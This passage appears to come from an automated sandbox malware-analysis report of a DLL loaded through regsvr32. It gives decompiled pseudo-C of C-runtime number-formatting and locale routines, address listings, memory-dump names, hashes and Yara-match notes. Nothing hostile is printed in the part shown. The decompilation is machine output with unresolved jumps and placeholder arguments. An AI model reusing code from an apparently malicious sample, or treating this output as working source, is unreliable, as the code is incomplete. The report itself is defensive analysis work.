				r8d = r8d | _t421 >> 0x0000001f;
				r9d = r9d | r8d >> 0x0000001f;
				r8d = r8d + r8d;
				r8d = r8d | _t422 >> 0x0000001f;
				r9d = r9d + r9d;
				r15d = _t556 + _t579 - __r11;
				r9d = r9d | r8d >> 0x0000001f;
				if (r15d - _t422 + _t422 < 0) goto 0x2b07daaa;
				if (r15d - r13d >= 0) goto 0x2b07dac7;
				_t325 = _t599 + 1;
				if (_t325 - r8d < 0) goto 0x2b07daba;
				if (_t325 - r11d >= 0) goto 0x2b07dabd;
				r8d = _t325;
				if (r11d == 0) goto 0x2b07dac7;
				r9d = r9d + r11d;
				r12d = _t599 + (_t626 >> 0x20);
				if (r12d - r8d < 0) goto 0x2b07dad9;
				if (r12d - r13d >= 0) goto 0x2b07dadc;
				r9d = r9d + r11d;
				r9d = r9d + (_t449 >> 1);
				r13d = 0;
				r8d = _t621 + _t621;
				r8d = r8d | r15d >> 0x0000001f;
				_t329 = __r9 + __r9 | r12d >> 0x0000001f;
				r14d = r14d - r11d;
				 *(_t589 - 0x11) = _t329;
				 *(_t589 - 0x19) = _t633 + _t633;
				 *(_t589 - 0x15) = r8d;
				 *(_t589 - 0xe) = r13b;
				 *_t609 = (_t329 >> 0x18) + 0x30;
				if (r14d <= 0) goto 0x2b07db28;
				goto 0x2b07da5e;
				_t611 = _t609 + __r11 - __r11;
				_t612 = _t611 - __r11;
				if ( *_t611 - 0x35 < 0) goto 0x2b07db9f;
				goto 0x2b07db44;
				if ( *_t612 != 0x39) goto 0x2b07db49;
				 *_t612 = 0x30;
				_t613 = _t612 - __r11;
				if (_t613 - _t582 >= 0) goto 0x2b07db37;
				if (_t613 - _t582 >= 0) goto 0x2b07db55;
				 *_t562 =  *_t562 + r11w;
				 *((intOrPtr*)(_t613 + __r11)) =  *((intOrPtr*)(_t613 + __r11)) + r11b;
				r10b = r10b - _t345;
				r10b = r10b - 3;
				_t562[0] = r10b;
				 *( &(_t562[1]) + r10b) = r13b;
				return E00007FFD7FFD2B064980(r12d >> 0x1f,  *(_t589 + 0x17) ^ _t592, _t579 - __r11, _t599);
			}

0x7ffd2b07d118
0x7ffd2b07d118
0x7ffd2b07d11e
0x7ffd2b07d11f
0x7ffd2b07d122
0x7ffd2b07d126
0x7ffd2b07d128
0x7ffd2b07d12d
0x7ffd2b07d134
0x7ffd2b07d13b
0x7ffd2b07d13e
0x7ffd2b07d142
0x7ffd2b07d146
0x7ffd2b07d149
0x7ffd2b07d14c
0x7ffd2b07d153
0x7ffd2b07d159
0x7ffd2b07d161
0x7ffd2b07d164
0x7ffd2b07d167
0x7ffd2b07d167
0x7ffd2b07d16b
0x7ffd2b07d16f
0x7ffd2b07d173
0x7ffd2b07d177
0x7ffd2b07d17e
0x7ffd2b07d185
0x7ffd2b07d18c
0x7ffd2b07d190
0x7ffd2b07d194
0x7ffd2b07d19b
0x7ffd2b07d19d
0x7ffd2b07d1a1
0x7ffd2b07d1a3
0x7ffd2b07d1a9
0x7ffd2b07d1ae
0x7ffd2b07d1b7
0x7ffd2b07d1c0
0x7ffd2b07d1c4
0x7ffd2b07d1ca
0x7ffd2b07d1ce
0x7ffd2b07d1d1
0x7ffd2b07d1d5
0x7ffd2b07d1de
0x7ffd2b07d1e9
0x7ffd2b07d1f0
0x7ffd2b07d1f2
0x7ffd2b07d1f5
0x7ffd2b07d1f7
0x7ffd2b07d1fc
0x7ffd2b07d1fe
0x7ffd2b07d215
0x7ffd2b07d21b
0x7ffd2b07d21e
0x7ffd2b07d225
0x7ffd2b07d22a
0x7ffd2b07d22f
0x7ffd2b07d233
0x7ffd2b07d23c
0x7ffd2b07d241
0x7ffd2b07d243
0x7ffd2b07d259
0x7ffd2b07d25b
0x7ffd2b07d25e
0x7ffd2b07d265
0x7ffd2b07d26a
0x7ffd2b07d26f
0x7ffd2b07d273
0x7ffd2b07d278
0x7ffd2b07d27a
0x7ffd2b07d290
0x7ffd2b07d297
0x7ffd2b07d29a
0x7ffd2b07d29c
0x7ffd2b07d29f
0x7ffd2b07d2a6
0x7ffd2b07d2ab
0x7ffd2b07d2b0
0x7ffd2b07d2b1
0x7ffd2b07d2b5
0x7ffd2b07d2c6
0x7ffd2b07d2c8
0x7ffd2b07d2ca
0x7ffd2b07d2ce
0x7ffd2b07d2d1
0x7ffd2b07d2d6
0x7ffd2b07d2d9
0x7ffd2b07d2e0
0x7ffd2b07d2e5
0x7ffd2b07d2ea
0x7ffd2b07d2eb
0x7ffd2b07d2f2
0x7ffd2b07d2fc
0x7ffd2b07d30f
0x7ffd2b07d319
0x7ffd2b07d323
0x7ffd2b07d327
0x7ffd2b07d32c
0x7ffd2b07d335
0x7ffd2b07d33d
0x7ffd2b07d341
0x7ffd2b07d341
0x7ffd2b07d344
0x7ffd2b07d347
0x7ffd2b07d34b
0x7ffd2b07d34e
0x7ffd2b07d351
0x7ffd2b07d35a
0x7ffd2b07d363
0x7ffd2b07d36a
0x7ffd2b07d36d
0x7ffd2b07d373
0x7ffd2b07d381
0x7ffd2b07d388
0x7ffd2b07d38c
0x7ffd2b07d390
0x7ffd2b07d39c
0x7ffd2b07d3a0
0x7ffd2b07d3a6
0x7ffd2b07d3af
0x7ffd2b07d3b1
0x7ffd2b07d3ba
0x7ffd2b07d3be
0x7ffd2b07d3c6
0x7ffd2b07d3cc
0x7ffd2b07d3d0
0x7ffd2b07d3d3
0x7ffd2b07d3d9
0x7ffd2b07d3dd
0x7ffd2b07d3e4
0x7ffd2b07d3e8
0x7ffd2b07d3f3
0x7ffd2b07d3f7
0x7ffd2b07d3ff
0x7ffd2b07d403
0x7ffd2b07d40b
0x7ffd2b07d415
0x7ffd2b07d41b
0x7ffd2b07d425
0x7ffd2b07d434
0x7ffd2b07d436
0x7ffd2b07d43e
0x7ffd2b07d444
0x7ffd2b07d44c
0x7ffd2b07d44e
0x7ffd2b07d455
0x7ffd2b07d45a
0x7ffd2b07d45e
0x7ffd2b07d460
0x7ffd2b07d465
0x7ffd2b07d46b
0x7ffd2b07d473
0x7ffd2b07d475
0x7ffd2b07d47e
0x7ffd2b07d485
0x7ffd2b07d48b
0x7ffd2b07d490
0x7ffd2b07d494
0x7ffd2b07d49a
0x7ffd2b07d49d
0x7ffd2b07d4a2
0x7ffd2b07d4b3
0x7ffd2b07d4bf
0x7ffd2b07d4c9
0x7ffd2b07d4ce
0x7ffd2b07d4d2
0x7ffd2b07d4d4
0x7ffd2b07d4d7
0x7ffd2b07d4de
0x7ffd2b07d4e0
0x7ffd2b07d4e4
0x7ffd2b07d4f2
0x7ffd2b07d4f8
0x7ffd2b07d4fe
0x7ffd2b07d507
0x7ffd2b07d509
0x7ffd2b07d50d
0x7ffd2b07d516
0x7ffd2b07d528
0x7ffd2b07d52d
0x7ffd2b07d535
0x7ffd2b07d53b
0x7ffd2b07d546
0x7ffd2b07d54c
0x7ffd2b07d54f
0x7ffd2b07d553
0x7ffd2b07d556
0x7ffd2b07d55e
0x7ffd2b07d560
0x7ffd2b07d564
0x7ffd2b07d566
0x7ffd2b07d56a
0x7ffd2b07d573
0x7ffd2b07d576
0x7ffd2b07d57a
0x7ffd2b07d57f
0x7ffd2b07d583
0x7ffd2b07d587
0x7ffd2b07d589
0x7ffd2b07d58c
0x7ffd2b07d592
0x7ffd2b07d5a1
0x7ffd2b07d5a4
0x7ffd2b07d5aa
0x7ffd2b07d5ad
0x7ffd2b07d5b1
0x7ffd2b07d5b6
0x7ffd2b07d5bb
0x7ffd2b07d5bf
0x7ffd2b07d5c9
0x7ffd2b07d5cd
0x7ffd2b07d5d1
0x7ffd2b07d5df
0x7ffd2b07d5e1
0x7ffd2b07d5ef
0x7ffd2b07d5f4
0x7ffd2b07d5f9
0x7ffd2b07d5fe
0x7ffd2b07d604
0x7ffd2b07d606
0x7ffd2b07d60a
0x7ffd2b07d611
0x7ffd2b07d613
0x7ffd2b07d617
0x7ffd2b07d61b
0x7ffd2b07d61d
0x7ffd2b07d621
0x7ffd2b07d625
0x7ffd2b07d627
0x7ffd2b07d62a
0x7ffd2b07d62d
0x7ffd2b07d631
0x7ffd2b07d636
0x7ffd2b07d639
0x7ffd2b07d63f
0x7ffd2b07d64e
0x7ffd2b07d654
0x7ffd2b07d65b
0x7ffd2b07d661
0x7ffd2b07d666
0x7ffd2b07d66a
0x7ffd2b07d66e
0x7ffd2b07d672
0x7ffd2b07d675
0x7ffd2b07d678
0x7ffd2b07d67f
0x7ffd2b07d684
0x7ffd2b07d686
0x7ffd2b07d68f
0x7ffd2b07d691
0x7ffd2b07d69c
0x7ffd2b07d6a2
0x7ffd2b07d6a5
0x7ffd2b07d6af
0x7ffd2b07d6bc
0x7ffd2b07d6c2
0x7ffd2b07d6c4
0x7ffd2b07d6ce
0x7ffd2b07d6d4
0x7ffd2b07d6db
0x7ffd2b07d6e5
0x7ffd2b07d6eb
0x7ffd2b07d6ef
0x7ffd2b07d6f3
0x7ffd2b07d6f6
0x7ffd2b07d6fa
0x7ffd2b07d6fe
0x7ffd2b07d702
0x7ffd2b07d70a
0x7ffd2b07d70e
0x7ffd2b07d712
0x7ffd2b07d716
0x7ffd2b07d71a
0x7ffd2b07d722
0x7ffd2b07d72c
0x7ffd2b07d736
0x7ffd2b07d73c
0x7ffd2b07d746
0x7ffd2b07d748
0x7ffd2b07d74c
0x7ffd2b07d754
0x7ffd2b07d756
0x7ffd2b07d75d
0x7ffd2b07d762
0x7ffd2b07d766
0x7ffd2b07d768
0x7ffd2b07d76d
0x7ffd2b07d775
0x7ffd2b07d777
0x7ffd2b07d77e
0x7ffd2b07d784
0x7ffd2b07d78a
0x7ffd2b07d78f
0x7ffd2b07d798
0x7ffd2b07d79b
0x7ffd2b07d7a1
0x7ffd2b07d7a3
0x7ffd2b07d7a6
0x7ffd2b07d7aa
0x7ffd2b07d7af
0x7ffd2b07d7ba
0x7ffd2b07d7c3
0x7ffd2b07d7ca
0x7ffd2b07d7cf
0x7ffd2b07d7d1
0x7ffd2b07d7d4
0x7ffd2b07d7db
0x7ffd2b07d7dd
0x7ffd2b07d7e1
0x7ffd2b07d7e4
0x7ffd2b07d7ef
0x7ffd2b07d7f1
0x7ffd2b07d7f5
0x7ffd2b07d7ff
0x7ffd2b07d802
0x7ffd2b07d809
0x7ffd2b07d80f
0x7ffd2b07d813
0x7ffd2b07d821
0x7ffd2b07d827
0x7ffd2b07d82f
0x7ffd2b07d834
0x7ffd2b07d83c
0x7ffd2b07d842
0x7ffd2b07d84d
0x7ffd2b07d853
0x7ffd2b07d856
0x7ffd2b07d85a
0x7ffd2b07d85d
0x7ffd2b07d865
0x7ffd2b07d867
0x7ffd2b07d86b
0x7ffd2b07d86d
0x7ffd2b07d871
0x7ffd2b07d87d
0x7ffd2b07d880
0x7ffd2b07d884
0x7ffd2b07d888
0x7ffd2b07d88a
0x7ffd2b07d88d
0x7ffd2b07d893
0x7ffd2b07d8a2
0x7ffd2b07d8a5
0x7ffd2b07d8ab
0x7ffd2b07d8ae
0x7ffd2b07d8b2
0x7ffd2b07d8b6
0x7ffd2b07d8ba
0x7ffd2b07d8be
0x7ffd2b07d8c8
0x7ffd2b07d8cc
0x7ffd2b07d8d0
0x7ffd2b07d8de
0x7ffd2b07d8e0
0x7ffd2b07d8ee
0x7ffd2b07d8f3
0x7ffd2b07d8f8
0x7ffd2b07d8fd
0x7ffd2b07d903
0x7ffd2b07d905
0x7ffd2b07d909
0x7ffd2b07d911
0x7ffd2b07d913
0x7ffd2b07d917
0x7ffd2b07d91b
0x7ffd2b07d91d
0x7ffd2b07d921
0x7ffd2b07d925
0x7ffd2b07d927
0x7ffd2b07d92a
0x7ffd2b07d92d
0x7ffd2b07d931
0x7ffd2b07d936
0x7ffd2b07d942
0x7ffd2b07d944
0x7ffd2b07d948
0x7ffd2b07d94e
0x7ffd2b07d957
0x7ffd2b07d95a
0x7ffd2b07d960
0x7ffd2b07d964
0x7ffd2b07d968
0x7ffd2b07d96c
0x7ffd2b07d96f
0x7ffd2b07d974
0x7ffd2b07d977
0x7ffd2b07d97e
0x7ffd2b07d980
0x7ffd2b07d984
0x7ffd2b07d98d
0x7ffd2b07d990
0x7ffd2b07d993
0x7ffd2b07d99b
0x7ffd2b07d99e
0x7ffd2b07d9a2
0x7ffd2b07d9a9
0x7ffd2b07d9ac
0x7ffd2b07d9b2
0x7ffd2b07d9bd
0x7ffd2b07d9c0
0x7ffd2b07d9c3
0x7ffd2b07d9c8
0x7ffd2b07d9d1
0x7ffd2b07d9dc
0x7ffd2b07d9dc
0x7ffd2b07d9e0
0x7ffd2b07d9e4
0x7ffd2b07d9e8
0x7ffd2b07d9f6
0x7ffd2b07d9ff
0x7ffd2b07da02
0x7ffd2b07da04
0x7ffd2b07da09
0x7ffd2b07da0b
0x7ffd2b07da0f
0x7ffd2b07da15
0x7ffd2b07da17
0x7ffd2b07da1a
0x7ffd2b07da21
0x7ffd2b07da2a
0x7ffd2b07da33
0x7ffd2b07da38
0x7ffd2b07da3b
0x7ffd2b07da40
0x7ffd2b07da42
0x7ffd2b07da46
0x7ffd2b07da49
0x7ffd2b07da4e
0x7ffd2b07da4e
0x7ffd2b07da52
0x7ffd2b07da58
0x7ffd2b07da5e
0x7ffd2b07da65
0x7ffd2b07da6d
0x7ffd2b07da72
0x7ffd2b07da76
0x7ffd2b07da7a
0x7ffd2b07da7d
0x7ffd2b07da88
0x7ffd2b07da8b
0x7ffd2b07da90
0x7ffd2b07da99
0x7ffd2b07da9d
0x7ffd2b07daa3
0x7ffd2b07daa8
0x7ffd2b07daaa
0x7ffd2b07dab3
0x7ffd2b07dab8
0x7ffd2b07dabd
0x7ffd2b07dac2
0x7ffd2b07dac4
0x7ffd2b07dacb
0x7ffd2b07dad2
0x7ffd2b07dad7
0x7ffd2b07dad9
0x7ffd2b07dadc
0x7ffd2b07dadf
0x7ffd2b07dae8
0x7ffd2b07daef
0x7ffd2b07daf9
0x7ffd2b07daff
0x7ffd2b07db02
0x7ffd2b07db08
0x7ffd2b07db0d
0x7ffd2b07db11
0x7ffd2b07db15
0x7ffd2b07db1e
0x7ffd2b07db23
0x7ffd2b07db28
0x7ffd2b07db2e
0x7ffd2b07db33
0x7ffd2b07db35
0x7ffd2b07db3b
0x7ffd2b07db3d
0x7ffd2b07db41
0x7ffd2b07db47
0x7ffd2b07db4c
0x7ffd2b07db51
0x7ffd2b07db55
0x7ffd2b07db58
0x7ffd2b07db5b
0x7ffd2b07db63
0x7ffd2b07db67
0x7ffd2b07db95

Strings

1#QNAN, xrefs: 00007FFD2B07D2B5
1#INF, xrefs: 00007FFD2B07D27E
1#SNAN, xrefs: 00007FFD2B07D202
1#IND, xrefs: 00007FFD2B07D247

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID:
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 0-2761157908
Opcode ID: 727ce07a53902cb76f339623ee1da871c8c7256c7c015f9dd5e26a20e53c543f
Instruction ID: 6efc28189a7279679319f7dad2098f80cb1b4caeb86334b9df509b5e5ab387dd
Opcode Fuzzy Hash: 727ce07a53902cb76f339623ee1da871c8c7256c7c015f9dd5e26a20e53c543f
Instruction Fuzzy Hash: 406206B6F192428FF716CF64CA20ABD77B1FB55348F404235CE0963AD4EA78A915E780

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001C108 Relevance: 5.3, Strings: 4, Instructions: 268COMMON

Download Yara Rule

Strings

z@, xrefs: 000000018001C525
E, xrefs: 000000018001C3AE
X, xrefs: 000000018001C44C
#X, xrefs: 000000018001C403

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$X$z@$E
API String ID: 0-3882157748
Opcode ID: b6a31d4014d88f3ed4831739a4752aba65529418ce781ad2496ce489ba133702
Instruction ID: 6d9294500fce893888222c02a35115425f9b7e085aa530851f65a0cb6f4d2f75
Opcode Fuzzy Hash: b6a31d4014d88f3ed4831739a4752aba65529418ce781ad2496ce489ba133702
Instruction Fuzzy Hash: 15D14771D04A4C8BEBA8CFE8C8896DDBFB1FF44344F14811DE416AA694D7B4994ACF06

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017CB0 Relevance: 5.2, Strings: 4, Instructions: 200COMMON

Download Yara Rule

Strings

22, xrefs: 0000000180017FAC
O, xrefs: 0000000180017FD3
L1, xrefs: 0000000180017F4A
'j, xrefs: 0000000180017F97

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 'j$22$L1$O
API String ID: 0-2877195160
Opcode ID: b7879977c5ce9c1248ad65d086e123eb71db835c7f10f45bad6449e5127c4bcd
Instruction ID: 0d09b015998af2a7f09ef414baaacdc416678862227913243af973efd13c4205
Opcode Fuzzy Hash: b7879977c5ce9c1248ad65d086e123eb71db835c7f10f45bad6449e5127c4bcd
Instruction Fuzzy Hash: 6CB1D37150078E8BDB48DF24D88A5DA3FB1FB68388F114618FC56962A0C7B8D6A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000CE88 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

;1, xrefs: 000000018000D0D6
c%, xrefs: 000000018000D141
[i9, xrefs: 000000018000CF58
\, xrefs: 000000018000CEF4

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ;1$c%$[i9$\
API String ID: 0-1566691149
Opcode ID: 7e0256d9dc0970131b042651486858cae521227d5f926d78ff99adf92a6a296f
Instruction ID: 1d0b1aebc6d805f01a66139074785db3085e3ef57a1ac993a454007b74a5e76a
Opcode Fuzzy Hash: 7e0256d9dc0970131b042651486858cae521227d5f926d78ff99adf92a6a296f
Instruction Fuzzy Hash: 76911C7050034E8BDB48CF24C88A6DE3FB0FB58388F255619FC5AA6290D7B8D695CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014DD0 Relevance: 5.1, Strings: 4, Instructions: 133COMMON

Download Yara Rule

Strings

!5, xrefs: 0000000180014DF1
Hp, xrefs: 0000000180014DF8
.;Cu, xrefs: 0000000180014EFA
e<hY, xrefs: 0000000180014F18

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !5$.;Cu$Hp$e<hY
API String ID: 0-3886692556
Opcode ID: 2d10b1bc25f04d6e854c85251d274f78bd7fa7e9d86821cc95133926e585948f
Instruction ID: c90e423365ee059e2e53f55b04756d908d8b1b8841c96bc4d45cd8ddcdc16a2a
Opcode Fuzzy Hash: 2d10b1bc25f04d6e854c85251d274f78bd7fa7e9d86821cc95133926e585948f
Instruction Fuzzy Hash: D261C2B090070E8BDF48CFA4C98A5EFBFB0FB58344F204519E916A62A1C7789655CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000B5CC Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

[, xrefs: 000000018000B63B
K!, xrefs: 000000018000B77A
K!, xrefs: 000000018000B75B
VS, xrefs: 000000018000B6B6

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: VS$K!$K!$[
API String ID: 0-941600464
Opcode ID: 5203046c57591beb8abf927361a5c1efe92546690a2194395d7fcff6a1efc1e3
Instruction ID: 24cb21ce85cfa0194e449551dcb0960389ee472d40193f350ecb83f0dafd5cb0
Opcode Fuzzy Hash: 5203046c57591beb8abf927361a5c1efe92546690a2194395d7fcff6a1efc1e3
Instruction Fuzzy Hash: 1751B2B190434A8FDB48CF68C48A4DE7FF0FB58398F114219E85AA7250D3B896A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000795C Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

RH, xrefs: 0000000180007968
5~, xrefs: 00000001800079EA
U"[1, xrefs: 00000001800079BA
r*, xrefs: 0000000180007A8D

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5~$RH$U"[1$r*
API String ID: 0-2392855146
Opcode ID: 74d4e9e8acceec8678675fea3afeade6188cda64566ec1506fd0b91fe4636237
Instruction ID: 2de3a728fb9f1c234df21541b8d92488d80701569f5b21d6f1c6647fb6b020d0
Opcode Fuzzy Hash: 74d4e9e8acceec8678675fea3afeade6188cda64566ec1506fd0b91fe4636237
Instruction Fuzzy Hash: 7D51E4B091074E8FDF88CF68D89A5DE7FB0FB08358F10461DE926A6250D3B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019B88 Relevance: 5.1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

Strings

vL, xrefs: 0000000180019C8D
/D, xrefs: 0000000180019CA6
o, xrefs: 0000000180019C58
d, xrefs: 0000000180019C1E

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /D$vL$d$o
API String ID: 0-2977468253
Opcode ID: ed753db6b5ccfd2e979d23812493129d1a1915ed191e1ff12a953608e8c656dd
Instruction ID: 62010c772727c25a8e2be5f45e579bf575341dbbeb2476438e3592c42907976d
Opcode Fuzzy Hash: ed753db6b5ccfd2e979d23812493129d1a1915ed191e1ff12a953608e8c656dd
Instruction Fuzzy Hash: F341A2B180034E8FEF84CF68D8894DE7BF0FB08358F104A19F869A6250D7B49664CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015120 Relevance: 5.1, Strings: 4, Instructions: 59COMMON

Download Yara Rule

Strings

s, xrefs: 0000000180015134
4, xrefs: 000000018001513C
k$E5, xrefs: 00000001800151CA
_A, xrefs: 000000018001520A

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: _A$k$E5$s$4
API String ID: 0-663462204
Opcode ID: 8a40fe451781e9b20feea338120dcb2eaeaaa429e8350153e19f197ed662c18e
Instruction ID: fd2aec7101dbf464b7382e3264293e0797881b621d91629743679140172157c5
Opcode Fuzzy Hash: 8a40fe451781e9b20feea338120dcb2eaeaaa429e8350153e19f197ed662c18e
Instruction Fuzzy Hash: C3316DB052C780AFD389DF28D48981EBBE0BB89748F806E1DF8C69B251D7B5D444CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001BA34 Relevance: 5.0, Strings: 4, Instructions: 47COMMON

Download Yara Rule

Strings

C, xrefs: 000000018001BB09
HH=^, xrefs: 000000018001BAC4
|G, xrefs: 000000018001BA48
ST, xrefs: 000000018001BA38

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: C$HH=^$ST$|G
API String ID: 0-2140810170
Opcode ID: 7de7f8c6360f7060eeb293604cd5bc6060700daae64bcca7bcf183f3099b0019
Instruction ID: 85683acb54d2ba5adedf66d596d363cd9430a1a7455b52370ea7d65832e45071
Opcode Fuzzy Hash: 7de7f8c6360f7060eeb293604cd5bc6060700daae64bcca7bcf183f3099b0019
Instruction Fuzzy Hash: D3215EB4528781AFE388CF24C08981BBBF0FB95354F816A1DF98A86250D7B5D444CB02

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B077D58 Relevance: 4.6, APIs: 3, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00007FFD7FFD2B077D58(void* __ecx, void* __edx, void* __eflags, long long __rbx, void* __rcx, void* __rdx, void* __rsi, void* __rbp, void* __r8, void* __r9, long long _a16) {
				signed int _v24;
				char _v152;
				char _v168;
				signed int _t26;
				signed int _t27;
				void* _t29;
				signed int _t38;
				signed long long _t60;
				signed long long _t61;
				signed long long _t74;
				void* _t77;

				_a16 = __rbx;
				_t60 =  *0x2b0c70a0; // 0xf787487f4682
				_t61 = _t60 ^ _t77 - 0x000000c0;
				_v24 = _t61;
				E00007FFD7FFD2B067F5C(__ecx, __eflags, _t61, __rcx, __rsi, __r8);
				_t74 = _t61;
				_t26 = E00007FFD7FFD2B0778B8(__rcx, __rdx, __r9);
				r9d = 0x78;
				asm("sbb edx, edx");
				_t38 = _t26;
				_t27 = GetLocaleInfoA(??, ??, ??, ??);
				if (_t27 != 0) goto 0x2b077dc9;
				 *(_t74 + 0x150) =  *(_t74 + 0x150) & _t27;
				goto 0x2b077e65;
				_t29 = E00007FFD7FFD2B07A374(_t61,  *((intOrPtr*)(_t74 + 0x140)));
				if (_t29 != 0) goto 0x2b077df9;
				if ( *((intOrPtr*)(_t74 + 0x158)) != _t29) goto 0x2b077e44;
				_t10 = _t74 + 0x140; // 0x140
				_t11 = _t61 + 1; // 0x1
				E00007FFD7FFD2B0779F8(_t38, _t11, __rcx, __rsi, __rbp, _t10);
				goto 0x2b077e40;
				if ( *((intOrPtr*)(_t74 + 0x158)) != 0) goto 0x2b077e57;
				if ( *((intOrPtr*)(_t74 + 0x154)) == 0) goto 0x2b077e57;
				if (E00007FFD7FFD2B07A374(_t61,  *((intOrPtr*)(_t74 + 0x140))) != 0) goto 0x2b077e57;
				_t16 = _t61 + 2; // 0x2
				r9d = _t16;
				asm("bts ecx, 0xa");
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x2b077e57;
				 *(_t74 + 0x150) =  *(_t74 + 0x150) | 0x00000004;
				 *(_t74 + 0x160) = _t38;
				 *(_t74 + 0x164) = _t38;
				return E00007FFD7FFD2B064980(_t38 & 0x000003ff, _v24 ^ _t77 - 0x000000c0,  &_v152,  &_v168);
			}

0x7ffd2b077d58
0x7ffd2b077d65
0x7ffd2b077d6c
0x7ffd2b077d6f
0x7ffd2b077d7a
0x7ffd2b077d82
0x7ffd2b077d85
0x7ffd2b077d97
0x7ffd2b077d9d
0x7ffd2b077da1
0x7ffd2b077daf
0x7ffd2b077db7
0x7ffd2b077db9
0x7ffd2b077dc4
0x7ffd2b077dd5
0x7ffd2b077ddc
0x7ffd2b077de4
0x7ffd2b077de6
0x7ffd2b077ded
0x7ffd2b077df2
0x7ffd2b077df7
0x7ffd2b077e00
0x7ffd2b077e09
0x7ffd2b077e1e
0x7ffd2b077e22
0x7ffd2b077e22
0x7ffd2b077e36
0x7ffd2b077e42
0x7ffd2b077e44
0x7ffd2b077e4b
0x7ffd2b077e51
0x7ffd2b077e85

APIs

_getptd.LIBCMT ref: 00007FFD2B077D7A

Part of subcall function 00007FFD2B067F5C: _amsg_exit.LIBCMT ref: 00007FFD2B067F72

GetLocaleInfoA.KERNEL32 ref: 00007FFD2B077DAF

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
